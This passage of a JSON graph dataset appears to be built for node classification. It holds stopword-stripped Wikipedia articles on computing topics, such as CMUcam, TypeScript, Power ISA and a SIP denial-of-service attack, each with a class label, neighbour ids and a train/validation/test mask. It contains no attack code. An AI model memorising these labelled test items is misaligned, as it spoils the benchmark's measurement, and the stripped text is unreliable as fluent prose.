    "label": 9,
    "text": "CMUcam:cmucam cmucam low cost computer vision device intended robotics research cmucams consist small video camera microcontroller serial interface digital cameras typically use much higher bandwidth connector cmucam lightweight interface allows accessed microcontrollers importantly on-board microprocessor supports simple image processing color blob tracking making rudimentary computer vision capable systems would previously far little power thing used past years high-school first robotics competition way letting participants robots track field elements navigate autonomously cmucam also extremely small form factor reasons relatively popular making small mobile robots original design originally made carnegie mellon university licensed various manufacturers pixy2 latest line cmucam sensors adds line tracking capability onboard light source previous cmucam5 aka original pixy sensors produced collaboration charmed labs austin tx",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 10979,
    "label": 5,
    "text": "Spotnet:spotnet spotnet protocol top usenet providing decentralized alternative usenet indexing websites nzb format general spotnet allows users create browse private 'newsservers decentralized repositories files information members share spots file sharing one another similar seeding process torrent sharing spotnet experienced tremendous growth since closure 2011 uses spotnet usenet varied one common creation home media servers several third-party applications allow automatic download categorization spots typically movies tv shows music files assist creation maintenance stored media spotnet articles placed textgroup headered using usenet client order get full experience need client compatible protocol example besides searching clients also functionality commenting spots well adding new ones index clients implement protocol without community-features spotnet xml-based format placed header usenet articles rsa signed xml contains metadata post group articles usually found .nfo file like description/genre/format also references accompanying image zipped nzb file elsewhere usenet message-id article serve link full post similar magnet uri indirectly references required articles links spread media like twitter without need central server hosting full specification protocol see spotnet wiki spotnet uses four usenet groups",
    "neighbors": [
      3218,
      3350,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 10980,
    "label": 9,
    "text": "Indexer_(programming):indexer programming object-oriented programming indexer allows instances particular class struct indexed like arrays form operator overloading indexers implemented get set accessors similar properties differ static fact indexers accessors take parameters get set accessors called methods using parameter list indexer declaration set accessor still implicit parameter c example usage indexer class",
    "neighbors": [
      11589,
      10143
    ],
    "mask": "Test"
  },
  {
    "node_id": 10981,
    "label": 9,
    "text": "Warren_Teitelman:warren teitelman warren teitelman 1941 – august 12 2013 american computer scientist known work programming environments invention first implementation concepts including undo redo spelling correction advising online help dwim mean warren teitelman presented novel scheme real time character recognition master thesis submitted 1966 mit rectangle character drawn divided two parts one shaded unshaded using division computer converts characters ternary vectors list composed 3 values 0 1 − following way pen enters shaded region 1 added vector unshaded region entered 0 appended thesis continued cited several decades submission started arpa principal investigator 1968 1978 responsible design development bbn lisp bolt beranek newman developing idea programming system personal computer used arpanet support users bbn lisp stanford sri usc cmu 1970 named official arpanet pioneer contributions development growth developed programmer assistant part bbn-lisp one first undo function 1971 developed program sds 940 bob kahn allowed experimentation various routing policies order see effect network traffic real time monitoring packets worked senior scientist xerox parc 1972 1984 time designed interlisp bill joy acknowledged many ideas c shell inspired copied interlisp interlisp teitelman invented dwim mean function attempted correct many common typing errors package lisp routines would correct errors automatically minor user intervention —thus making code user meant wrote program developed based upon teitelman writing style idiosyncrasies 1972 used individuals office followed users across industry 1977 bob sproull implemented first client–server window system d-lisp d-lisp used alto display device ran window manager event handler communicating interlisp running maxc pdp-10 clone system pioneered concepts overlapping windows window containing focus top receive events on-line contextual help ability cut copy paste previous commands given shell joined cedar project 1980 research strongly typed languages make sure cedar programming environment benefited lessons interlisp paper “ tour cedar ” widely published quoted even translated several languages eponymous teitelman principle says person requests feature added program add feature find way make easier programmer add feature themself teitelman also early proponent use email multi-tasking feature modern computer joined sun microsystems 1984 became sun ’ first distinguished engineer 1986 also director multi-media sun departure 1992 worked director programming environments rational software also lucid inc. caere corporation one founders startup called baystone software developed crm customer relations management software based action request system remedy corporation invented idea business rules data elements rather code embodied much business process remedy acquired baystone 1998 held position chief scientist crm business unit remedy joined google 2003",
    "neighbors": [
      11488,
      9665,
      1316,
      1159,
      7048,
      6603,
      8173,
      7158,
      1783,
      10102,
      8474
    ],
    "mask": "Test"
  },
  {
    "node_id": 10982,
    "label": 3,
    "text": "SPARCstation_IPC:sparcstation ipc sparcstation ipc sun 4/40 workstation sold sun microsystems based sun4c architecture enclosed lunchbox chassis sparcstation ipc incorporates fujitsu mb86901a lsi l64801 25 mhz processor sparcstation ipc limited use single-processor machine sparcstation ipc twelve simm memory slots three 4-slot groups group 4 slots filled either four 1mb simms four 4mb simms maximum 48mb sparcstation ipc hold one internal 3.5 50-pin single ended fast-narrow se scsi disk drive 3.5 1.44mb floppy disk drive also supports external scsi devices ide/atapi support modern 80 pin single connector attachment sca drives work adapter fit inside case due size adapter sparcstation ipc following interfaces sparcstation ipc comes on-board amd lance ethernet chipset 15-pin aui connector connect 10base2 10base5 10baset via appropriate transceiver openboot rom able boot network using rarp tftp like sparcstation systems ipc holds system information mac address serial number nvram battery chip dies system able boot without manual intervention keyboard entry boot parameters sparcstation ipc uses m48t02 battery-backed rtc ram chip handles real time clock boot parameter storage issue chip battery internal means entire chip must replaced battery runs sparcstation ipcs made older battery life chip substantial number systems refuse boot additionally sparcstation ipc design used reserved bits m48t02 nvram non-standard way since later revisions m48t02 chip exert stricter control bits current m48t02 store nvram data rtc function correctly system may fail auto-boot due incompatibilities modern m48t02s common modify failed nvrams cutting encapsulation patching new battery also possible replace entire encapsulation also contains 32.768 khz clock crystal following operating systems run sparcstation ipc sparcstation 1+ sun 4/65 architecturally similar housed pizza box form factor sparcstation ipx sun 4/50 later lunchbox form factor system",
    "neighbors": [
      9665,
      11553,
      9955,
      10436,
      7594,
      9422,
      11440,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10983,
    "label": 9,
    "text": "Wide-spectrum_language:wide-spectrum language wide-spectrum language wsl programming language designed simultaneously low-level high-level language—possibly non-executable specification language wide-spectrum languages designed support programming methodology based program refinement concept introduced f. l. bauer et al 1978 ... program developed step step applying correctness preserving transformations ... development process thus involves usually multiple reshapings ... since current programming languages contain concepts needed formulation different versions programmer nowadays forced use different languages avoid transition one language another seems appropriate one coherent language frame covering whole spectrum outlined i.e wide spectrum language advantage single language rather separate specification high-level low-level languages program incrementally refined intermediate versions retaining higher-level lower-level constructs bauer group developed cip-l wide-spectrum language cip-s program transformation system",
    "neighbors": [
      2392,
      8262,
      2062,
      1392,
      9330,
      9331,
      4980,
      5496,
      7386
    ],
    "mask": "Test"
  },
  {
    "node_id": 10984,
    "label": 3,
    "text": "S1_Core:s1 core s1 core codename sirocco open source hardware microprocessor design developed simply risc based sun microsystems ultrasparc t1 s1 core licensed gnu general public license license sun chose opensparc project main goal project keep s1 core simple possible encourage developers major differences t1 s1 include",
    "neighbors": [
      9665,
      10789,
      398,
      1399,
      8508,
      8863
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10985,
    "label": 3,
    "text": "Power_ISA:power isa power isa instruction set architecture isa developed openpower foundation led ibm originally developed defunct power.org industry group power isa evolution powerpc isa created mergers core powerpc isa optional book e embedded applications merger two components 2006 led power.org founders ibm freescale semiconductor isa divided several categories every component defined part category category resides within certain book processors implement set categories different classes processors required implement certain categories example server class processor includes categories base server floating-point 64-bit etc processors implement base category power isa risc load/store architecture multiple sets registers instructions length 32 bits exception vle variable-length encoding subset provides higher code density low-end embedded applications instructions triadic i.e two source operands one destination single double precision ieee-754 compliant floating point operations supported including additional fused multiply–add fma decimal floating-point instructions provisions simd operations integer floating point data 16 elements single instruction support harvard cache i.e split data instruction caches well support unified caches memory operations strictly load/store allow out-of-order execution support big little-endian addressing separate categories moded per-page endianness support 32-bit 64-bit addressing different modes operation include user supervisor hypervisor power isa specification divided five parts called books specification power isa v.2.03 based former powerpc isa v.2.02 power5+ book e extension powerpc specification book included five new chapters regarding auxiliary processing units like dsps altivec extension compliant cores specification power isa v.2.04 finalized june 2007 based power isa v.2.03 includes changes primarily book iii-s part regarding virtualization hypervisor functionality logical partitioning virtual page handling compliant cores specification power isa v.2.05 released december 2007 based power isa v.2.04 includes changes primarily book book iii-s including significant enhancements decimal arithmetic category decimal floating-point book server hypervisor improvements compliant cores specification power isa v.2.06 released february 2009 revised july 2010 based power isa v.2.05 includes extensions power7 processor e500-mc core one significant new feature vector-scalar floating-point instructions vsx book iii-e also includes significant enhancement embedded specification regarding hypervisor virtualisation single multi core implementations spec revised november 2010 power isa v.2.06 revision b spec enhancing virtualization features compliant cores specification power isa v.2.07 released may 2013 based power isa v.2.06 includes major enhancements logical partition functionality transactional memory expanded performance monitoring new storage control features additions vmx vsx vector facilities vsx-2 along aes galois counter mode gcm sha-224 sha-256 sha-384 sha-512 sha-2 cryptographic extensions cyclic redundancy check crc algorithms spec revised april 2015 power isa v.2.07 b spec compliant cores specification power isa v.3.0 released november 2015 first come founding openpower foundation includes enhancements broad spectrum workloads removes server embedded categories retaining backwards compatibility adds support vsx-3 instructions new functions include 128-bit quad-precision floating-point operations random number generator hardware-assisted garbage collection hardware-enforced trusted computing spec revised march 2017 power isa v.3.0 b spec compliant cores",
    "neighbors": [
      7173,
      6663,
      5642,
      9739,
      1548,
      2066,
      7699,
      5655,
      1563,
      10779,
      10781,
      6181,
      8231,
      2088,
      10796,
      3630,
      4144,
      6705,
      7218,
      11314,
      6715,
      1085,
      2623,
      9280,
      2113,
      7234,
      3142,
      2638,
      6738,
      9302,
      1115,
      8795,
      2655,
      1122,
      1635,
      3175,
      7783,
      8815,
      3185,
      4211,
      5235,
      630,
      8822,
      6268,
      3197,
      643,
      2179,
      4743,
      4237,
      7313,
      9369,
      9371,
      1181,
      8861,
      6815,
      8352,
      5793,
      6818,
      6821,
      6311,
      4264,
      682,
      7852,
      4269,
      9391,
      2224,
      5297,
      2226,
      7858,
      9911,
      8890,
      1725,
      4286,
      2241,
      2243,
      9932,
      5326,
      5329,
      5844,
      9428,
      10966,
      731,
      6878,
      11487,
      9445,
      7911,
      10985,
      5356,
      9964,
      5358,
      1776,
      8944,
      757,
      246,
      2805,
      1784,
      249,
      9976,
      3323,
      8700,
      6909,
      10485,
      9472,
      6914,
      8450,
      3844,
      2821,
      1798,
      3846,
      4868,
      1801,
      10501,
      6924,
      6926,
      6415,
      4881,
      1298,
      11539,
      11028,
      9500,
      1309,
      2339,
      6949,
      6950,
      1321,
      3886,
      815,
      10543,
      11566,
      306,
      309,
      8501,
      8506,
      5948,
      9020,
      4928,
      833,
      8514,
      9541,
      3911,
      4423,
      6476,
      336,
      7505,
      8530,
      9044,
      11604,
      342,
      344,
      859,
      11613,
      8543,
      1376,
      869,
      10603,
      9582,
      1903,
      8048,
      4465,
      6004,
      10612,
      1399,
      7033,
      1402,
      3451,
      8058,
      10620,
      3457,
      4491,
      398,
      3470,
      3472,
      5006,
      5518,
      5523,
      6038,
      407,
      409,
      7065,
      10658,
      3493,
      8102,
      9126,
      10669,
      1967,
      2480,
      4017,
      11184,
      10675,
      1461,
      1462,
      1463,
      6072,
      7607,
      8120,
      8125,
      4030,
      1983,
      8126,
      1985,
      6084,
      453,
      3014,
      10180,
      6607,
      977,
      466,
      2514,
      3025,
      2517,
      3540,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      10214,
      4587,
      9707,
      10734,
      6639,
      499,
      4596,
      2039,
      10746,
      4603,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 10986,
    "label": 7,
    "text": "My_Windows_Phone:windows phone windows phone previously windows phone live free online companion service windows phone mobile devices microsoft service released conjunction launch windows phone 7 october 21 2010 provides users free mobile phone back-up solution wirelessly synchronizing contacts calendar appointments photos onenote notebooks various tightly-integrated windows live services including people outlook.com calendar microsoft onedrive users access manage information stored windows phone devices via password protected online portal using microsoft account windows phone also includes find phone service facilitates tracking lost stolen phone internet messages similar phone finder services various names available families smartphones similar service windows mobile devices available microsoft phone withdrawn 2011 service updated september 27 2011 conjunction release windows phone 7.5 mango update adding support microsoft scrapbook account management features including viewing app purchase history reinstall apps windows phone store windows phone 8 apollo update windows phone also added family feature allowing parents manage child accounts running windows phone 8 february 2015 microsoft moved find phone feature windows phone site microsoft account website preparation windows 10 windows phone offers following features",
    "neighbors": [
      4704,
      5057,
      7456,
      11559,
      2443,
      430,
      4624,
      10388,
      6709,
      254,
      9434,
      1083,
      2589,
      2046
    ],
    "mask": "Test"
  },
  {
    "node_id": 10987,
    "label": 4,
    "text": "PC_Tools_(company):pc tools company pc tools founded 2003 formerly known winguides.com software company acquired symantec 2008 new owner eventually discontinued pc tools name company headquarters australia offices luxembourg united states united kingdom ireland ukraine company previously developed distributed security optimization software mac os x microsoft windows platforms 29 november 2006 software owned pc tools downloaded 125 million times pc tools browser defender also called browser defender short browser toolbar internet explorer mozilla firefox browsers windows based computers browser defender allows safe web surfing iantivirus updated 2012 rebranded symantec norton brand pc tools iantivirus free antivirus software intel based apple macintosh computers running mac os 10.5 leopard mac os 10.6 snow leopard initially released june 2008 used detect remove malware spyware malicious exploits using signature-based heuristic detection iantivirus criticized scans macintosh viruses ignoring windows linux viruses praised speed low usage system resources pc tools internet security combination spyware doctor product firewall product anti spam product provided functionality three stand alone products single seamless product symantec longer offering product 18 may 2013 payware designed windows 8 32-/64-bit windows 7 32-/64-bit windows vista 32-/64-bit windows xp 32-bit pc tools registry mechanic first software pc tools released scanned windows registry find errors version 11 released 31 october 2011 last one pc tools spyware doctor anti-malware software spyware doctor detects malware based indicators compromise using spider technology recent version spyware doctor 9 released 31 october 2011 symantec longer offering product 18 may 2013 pc tools spyware doctor antivirus features spyware doctor added anti-virus capabilities symantec sold since 2013 v9 last one available threatexpert web site says advanced automated threat analysis system initialized atas built analyze report actions malware fully automated mode latest version beta version 1.0.1.0 1 march 2008 updates since march 2008 web site seems inactive 18 august 2008 symantec announced signing agreement acquire pc tools pc tools would maintain separate operations financial terms acquisition disclosed symantec acquired pc tools us 262,000,000 6 october 2008 symantec withdrew entire pc tools security portfolio comprising pc tools internet security spyware doctor spyware doctor antivirus 18 may 2013 pc tools sold could renewed 4 december 2013 symantec said would affect pc tools utilities products spyware doctor received pc world best buy award october 2007 issue magazine saying pc tools spyware doctor 5.0 winner outperforming competition detecting removing test set adware spyware samples spyware doctor received several editors choice awards pc magazine including one spyware doctor antivirus 5.5 2008 product also received numerous awards around globe reviews positive early versions spyware doctor 5.0 company rewrote scratch received negative commentary cnet download.com reviews justifies 3-star rating saying trial scans spyware doctor repeatedly flagged several dozen harmless cookies potential threats antispyware product tested also unable learn threat spyware doctor flagged symantec unsuccessfully sued washington resident running fake scans get people pay subscriptions pc tools registry mechanic performance toolkit norton utilities lawsuit claims company intentionally ran fake scans results real new wrinkle adware using stolen certificates disables anti-malware virus protection technical remedies available",
    "neighbors": [
      1792,
      2049,
      4480,
      6797,
      3473,
      1172,
      9496,
      10392,
      3482,
      1436,
      4511,
      6431,
      5924,
      2213,
      550,
      8998,
      10790,
      1708,
      3885,
      8753,
      823,
      569,
      5178,
      11577,
      3065,
      5057,
      1858,
      10433,
      11073,
      2118,
      4814,
      9423,
      10574,
      7121,
      10708,
      4568,
      9048,
      2907,
      6364,
      7515,
      9569,
      2147,
      5860,
      3942,
      10987,
      8943,
      4464,
      8816,
      9971,
      10872,
      1273,
      9983
    ],
    "mask": "Train"
  },
  {
    "node_id": 10988,
    "label": 7,
    "text": "ZetaGrid:zetagrid zetagrid one time largest distributed computing project designed explore roots riemann zeta function checking one billion roots day roots zeta function particular interest mathematics since presence even single one line rest would disprove riemann hypothesis far-reaching consequences mathematics far every single one failed provide counterexample riemann hypothesis project ended november 2005 due instability hosting provider 10 first zeroes checked results analyzed project administrator stated posted american mathematical society website",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 10989,
    "label": 2,
    "text": "List_of_features_removed_in_Windows_8:list features removed windows 8 windows 8 version windows nt successor windows 7 several features present windows vista windows 7 longer present windows 8",
    "neighbors": [
      2432,
      641,
      8576,
      3463,
      651,
      5643,
      6797,
      8080,
      8976,
      10896,
      11283,
      2196,
      10900,
      4248,
      4505,
      11677,
      5281,
      4515,
      8227,
      11301,
      3496,
      6441,
      6697,
      1581,
      3250,
      3890,
      5300,
      9910,
      5435,
      6972,
      6462,
      7615,
      321,
      7106,
      582,
      200,
      1098,
      1741,
      10957,
      3922,
      9173,
      11605,
      2391,
      6744,
      3289,
      4316,
      8798,
      11103,
      5600,
      10338,
      740,
      2919,
      8296,
      5225,
      4074,
      8299,
      4731,
      8315,
      9448,
      5103,
      11247,
      7796,
      6265,
      7290,
      2811,
      636,
      639
    ],
    "mask": "Test"
  },
  {
    "node_id": 10990,
    "label": 4,
    "text": "ShieldsUP:shieldsup shieldsup online port scanning service created steve gibson gibson research corporation purpose utility alert users ports opened firewalls nat routers utility scan common file sharing ports well service ports 1-1056 user defined ports sets 64 often recommended checking port vulnerabilities scanning servers static ip addresses 4.79.142.192 4.79.142.207",
    "neighbors": [
      6993,
      11051
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10991,
    "label": 9,
    "text": "TypeScript:typescript typescript open-source programming language developed maintained microsoft strict syntactical superset javascript adds optional static typing language typescript designed development large applications transcompiles javascript typescript superset javascript existing javascript programs also valid typescript programs typescript may used develop javascript applications client-side server-side node.js execution multiple options available transcompilation either default typescript checker used babel compiler invoked convert typescript javascript typescript supports definition files contain type information existing javascript libraries much like c++ header files describe structure existing object files enables programs use values defined files statically typed typescript entities third-party header files popular libraries jquery mongodb d3.js typescript headers node.js basic modules also available allowing development node.js programs within typescript typescript compiler written typescript compiled javascript licensed apache 2.0 license typescript included first-class programming language microsoft visual studio 2013 update 2 later beside c microsoft languages official extension allows visual studio 2012 support typescript well anders hejlsberg lead architect c creator delphi turbo pascal worked development typescript typescript first made public october 2012 version 0.8 two years internal development microsoft soon announcement miguel de icaza praised language criticized lack mature ide support apart microsoft visual studio available linux os x time today support ides particularly eclipse via plug-in contributed palantir technologies various text editors including emacs vim sublime webstorm atom microsoft visual studio code also support typescript typescript 0.9 released 2013 added support generics typescript 1.0 released microsoft build developer conference 2014 visual studio 2013 update 2 provides built-in support typescript july 2014 development team announced new typescript compiler claiming 5× performance gains simultaneously source code initially hosted codeplex moved github 22 september 2016 typescript 2.0 released introduced several features including ability programmers optionally prevent variables assigned values sometimes referred billion-dollar mistake typescript originated shortcomings javascript development large-scale applications microsoft among external customers challenges dealing complex javascript code led demand custom tooling ease developing components language typescript developers sought solution would break compatibility standard cross-platform support knowing current ecmascript standard proposal promised future support class-based programming typescript based proposal led javascript compiler set syntactical language extensions superset based proposal transforms extensions regular javascript sense typescript preview expect ecmascript 2015 unique aspect proposal added typescript optional static typing enables static language analysis facilitates tooling ide support typescript adds support features classes modules arrow function syntax defined ecmascript 2015 standard typescript language extension adds features ecmascript 6 additional features include following features backported ecmascript 2015 syntactically typescript similar jscript .net another microsoft implementation ecma-262 language standard added support static typing classical object-oriented language features classes inheritance interfaces namespaces typescript strict superset ecmascript 2015 superset ecmascript 5 commonly referred javascript javascript program also valid typescript program typescript program seamlessly consume javascript default compiler targets ecmascript 5 current prevailing standard also able generate constructs used ecmascript 3 2015 typescript possible use existing javascript code incorporate popular javascript libraries call typescript-generated code javascript type declarations libraries provided source code typescript provides static typing type annotations enable type checking compile time optional ignored use regular dynamic typing javascript annotations primitive types codice_1 codice_2 codice_3 weakly- dynamically-typed structures type codice_4 type annotations exported separate declarations file make type information available typescript scripts using types already compiled javascript annotations declared existing javascript library done node.js jquery typescript compiler makes use type inference infer types types given example codice_5 method code would inferred returning codice_1 even return type annotation provided based static types codice_7 codice_8 codice_9 compiler knowledge result adding two codice_9 always codice_1 however explicitly declaring return type allows compiler verify correctness type inferred lack declarations defaults dynamic codice_4 type value codice_4 type supports operations value javascript minimal static type checking performed operations codice_4 values typescript script gets compiled option generate declaration file extension codice_15 functions interface components compiled javascript process compiler strips away function method bodies preserves signatures types exported resulting declaration file used describe exported virtual typescript types javascript library module third-party developer consumes typescript concept declaration files analogous concept header file found c/c++ type declaration files written hand existing javascript libraries done jquery node.js large collections declaration files popular javascript libraries hosted github definitelytyped typescript supports ecmascript 2015 classes integrate optional type annotations support typescript supports generic programming typescript distinguishes modules namespaces features typescript support encapsulation classes interfaces functions variables containers namespaces formerly internal modules utilize immediately-invoked function expression javascript encapsulate code whereas modules formerly external modules leverage javascript library patterns amd commonjs typescript compiler named codice_16 written typescript result compiled regular javascript executed javascript engine e.g browser compiler package comes bundled script host execute compiler also available node.js package uses node.js host also alpha version client-side compiler javascript executes typescript code fly upon page load current version compiler supports ecmascript 5 default option allowed target ecmascript 2015 make use language features exclusive version e.g generators classes despite part ecmascript 2015 standard available modes using plug-ins typescript integrated build automation tools including grunt grunt-ts apache maven typescript maven plugin gulp gulp-typescript gradle typescript gradle plugin tslint scans typescript code conformance set standards guidelines eslint standard javascript linter also provided support typescript via community plugins however eslint inability leverage typescript language services precluded certain forms semantic linting program-wide analysis early 2019 tslint team announced linter deprecation favor codice_17 joint effort tslint eslint typescript teams consolidate linting eslint umbrella improved performance community unity developer accessibility",
    "neighbors": [
      10243,
      6154,
      4623,
      10769,
      9234,
      1043,
      9245,
      3102,
      1055,
      6176,
      2083,
      8227,
      1577,
      5677,
      4143,
      9263,
      9780,
      1077,
      6709,
      8246,
      11316,
      8251,
      574,
      6718,
      8262,
      4171,
      4174,
      4178,
      83,
      84,
      6228,
      9813,
      603,
      608,
      2145,
      8289,
      5219,
      1130,
      1656,
      3705,
      5754,
      7292,
      9340,
      5761,
      9345,
      9348,
      5765,
      10886,
      2183,
      6791,
      5259,
      653,
      10387,
      10900,
      8854,
      10902,
      3224,
      11414,
      7326,
      1698,
      4771,
      7846,
      4777,
      10414,
      3761,
      1203,
      692,
      6143,
      5311,
      7871,
      6338,
      8391,
      5833,
      7889,
      214,
      9943,
      9434,
      8923,
      2783,
      736,
      4321,
      6370,
      228,
      4836,
      7396,
      3303,
      10470,
      1770,
      11498,
      3821,
      3313,
      2804,
      259,
      1802,
      10507,
      8973,
      6927,
      5395,
      9491,
      11030,
      5401,
      4378,
      5913,
      7450,
      10013,
      8990,
      7455,
      4384,
      11546,
      803,
      3876,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      11060,
      4920,
      3386,
      315,
      2880,
      5952,
      1348,
      844,
      8524,
      847,
      11087,
      339,
      9557,
      1366,
      2903,
      9560,
      9561,
      10079,
      11616,
      2401,
      8549,
      6502,
      8554,
      5483,
      364,
      10097,
      3960,
      8059,
      2943,
      6016,
      1409,
      8068,
      3462,
      8582,
      9609,
      9612,
      8082,
      7064,
      9114,
      1435,
      8605,
      10654,
      8607,
      11683,
      7076,
      5031,
      4010,
      428,
      10157,
      438,
      8630,
      6584,
      6074,
      2493,
      1470,
      9152,
      8644,
      5067,
      7629,
      11219,
      11221,
      2519,
      4056,
      477,
      8161,
      482,
      6114,
      487,
      7147,
      9195,
      5101,
      4590,
      9196,
      11247,
      10739,
      3573,
      9205,
      10229,
      10744,
      2556,
      2045,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 10992,
    "label": 5,
    "text": "GPRP:gprp gprp global position routing protocol internet routing protocol like ipv4 ipv6 uses spatial position determined gps host network establish routes host intended supplement ultimately replace traditional internet routing protocols requires cooperation many luminal-speed radio fiber optic hosts route packets efficient way straight line protocol consists mainly concepts ipv4 removing abstraction layer routing table ip address simpler model attempts send packets close straight line possible since change introduces physical constraints geometry network special techniques implemented overcome problems dead zones project began submission 2008 google contest ted coffman goals democratizing internet away need isps vulnerable regulation world governments interest generated idea submitted reddit.com internet community little feedback reddit nothing done concept two years january 2011 coffman decided move forward development due recent surge open platform smart phones wi-fi gps built right coffman sees perfect medium widespread implementation gprp january 2011 gprp c++ class developed tested ted coffman maintain backward-compatibility current internet framework ipv4 gateways discovered using similar techniques dns lookups many traditional ipv4 concepts considered physical forms gprp",
    "neighbors": [
      5469,
      5470
    ],
    "mask": "None"
  },
  {
    "node_id": 10993,
    "label": 2,
    "text": "Windows_Resource_Protection:windows resource protection windows resource protection feature windows vista replaces windows file protection protects registry keys folders addition critical system files way protects resources differs entirely method used windows file protection windows resource protection works registering notification file changes winlogon changes detected protected system file modified file restored cached copy located compressed folder windir \\system32\\dllcache windows resource protection works setting discretionary access control lists dacls access control lists acls defined protected resources permission full access modify wrp-protected resources restricted processes using windows modules installer service trustedinstaller.exe administrators longer full rights system files use setupapi take ownership resource add appropriate access control entries aces modify replace trusted installer account used secure core operating system files registry keys windows resource protection protects large number file types wrp also protects several critical folders folder containing wrp-protected files may locked trusted installer able create files subfolders folder folder may partially locked enable administrators create files subfolders folder essential registry keys installed windows vista also protected key protected wrp sub-keys values protected also wrp copies files needed restart windows cache directory located windir \\winsxs\\backup critical files needed restart windows copied cache directory unlike windows file protection cached entire set protected file types dllcache folder size cache directory list files copied cache modified windows resource protection applies stricter measures protect files result windows file protection available windows vista order replace single protected file windows file protection disabled completely windows resource protection works per-item basis setting acls therefore taking ownership single item particular item replaced items remain protected system file checker also integrated wrp windows vista sfc.exe used check specific folder paths including windows folder boot folder",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      3723,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      9505,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      2027,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 10994,
    "label": 9,
    "text": "IgniteFusion:ignitefusion ignitefusion freeware cfml script engine runs cfm script files similar perl php script engines ignitefusion script engine runs executable server cfml engines include adobe coldfusion new atlanta bluedragon railo lucee coral web builder coldfusion",
    "neighbors": [
      4512,
      5314,
      8644,
      8262,
      8582,
      9144,
      5048,
      4507
    ],
    "mask": "Test"
  },
  {
    "node_id": 10995,
    "label": 7,
    "text": "BitChute:bitchute bitchute video hosting service uses peer-to-peer webtorrent technology founded way avoid content rules enforced platforms like youtube creators banned channels demonetized barred receiving advertising revenue youtube migrated bitchute platform accommodates far-right individuals conspiracy theorists southern poverty law center accuses site hosting hate-fueled material company launched ray vahey january 2017 based peer-to-peer webtorrent system javascript torrenting program run web browser users watch video also seed bitchute rely advertising users send payments video creators directly november 2018 bitchute banned paypal alex jones proud boys tommy robinson several anti-fascists also banned time january 2019 bitchute announced post gab would move domains epik small domain registrar known accepting registration websites host far-right content bitchute accommodated far-right groups individuals criticized southern poverty law center hosting hate-fueled material conflict youtube right-wing video creators inclusion hate speech misinformation videos youtube responded cases banning creators blocking videos channel demonetization vahey described bitchute alternative option avoid bannings demonetization tweaking algorithms send certain content obscurity views increased levels censorship established services like youtube users groups banned youtube migrated bitchute including alex jones far-right conspiracy theory channel infowars prominent far-right alt-right video creators banned youtube cross-post videos bitchute including lauren southern stefan molyneux millennial woes paul joseph watson",
    "neighbors": [
      10368,
      3428,
      708,
      3462,
      3813,
      10924,
      7761,
      82,
      8244,
      11029,
      11413,
      4120,
      441,
      8413,
      10270,
      735
    ],
    "mask": "None"
  },
  {
    "node_id": 10996,
    "label": 4,
    "text": "INVITE_of_Death:invite death invite death type attack voip-system involves sending malformed otherwise malicious sip invite request telephony server resulting crash server telephony usually critical application damage causes significant disruption users poses tremendous acceptance problems voip kinds attacks necessarily affect sip-based systems implementations vulnerabilities voip area affected dos attack also transported messages invite example december 2007 report vulnerability bye message bye bye using obsolete header name also however sending invite packets popular way attacking telephony systems name reference ping death attack caused serious trouble 1995-1997 invite death vulnerability found february 16 2009 vulnerability allows attacker crash server causing remote denial service dos sending single malformed packet impersonator using malformed packet overflow specific string buffers add large number token characters modify fields illegal fashion result server tricked undefined state lead call processing delays unauthorized access complete denial service problem specifically exists opensbc version 1.1.5-25 handling “ via ” field maliciously crafted sip packet invite death packet also used find new vulnerability patched opensbc server network dialog minimization popular open source-based asterisk pbx security advisories cover signaling-related problems also problems protocols resolution problems may malformed sdp attachments codex numbers valid range obsolete headers “ also ” invite death specifically problem operators run servers public internet sip allows usage udp packets easy attacker spoof source address internet send invite death untraceable locations sending kinds requests periodically attackers completely interrupt telephony service choice service provider upgrade systems attack crash system anymore large number voip vulnerabilities exist ip phones dos attacks voip phones less critical attacks central devices like ip-pbx usually endpoint affected",
    "neighbors": [
      3024,
      10271,
      11671,
      6735
    ],
    "mask": "Test"
  },
  {
    "node_id": 10997,
    "label": 4,
    "text": "Kiss_(cryptanalysis):kiss cryptanalysis cryptanalysis kiss pair identical messages sent using different ciphers one broken term used bletchley park world war ii deciphered message breakable system provided crib piece known plaintext could used read unbroken messages one example messages read german meteorological cipher could used provide cribs reading difficult 4-wheel naval enigma cipher",
    "neighbors": [
      9156,
      1941
    ],
    "mask": "None"
  },
  {
    "node_id": 10998,
    "label": 1,
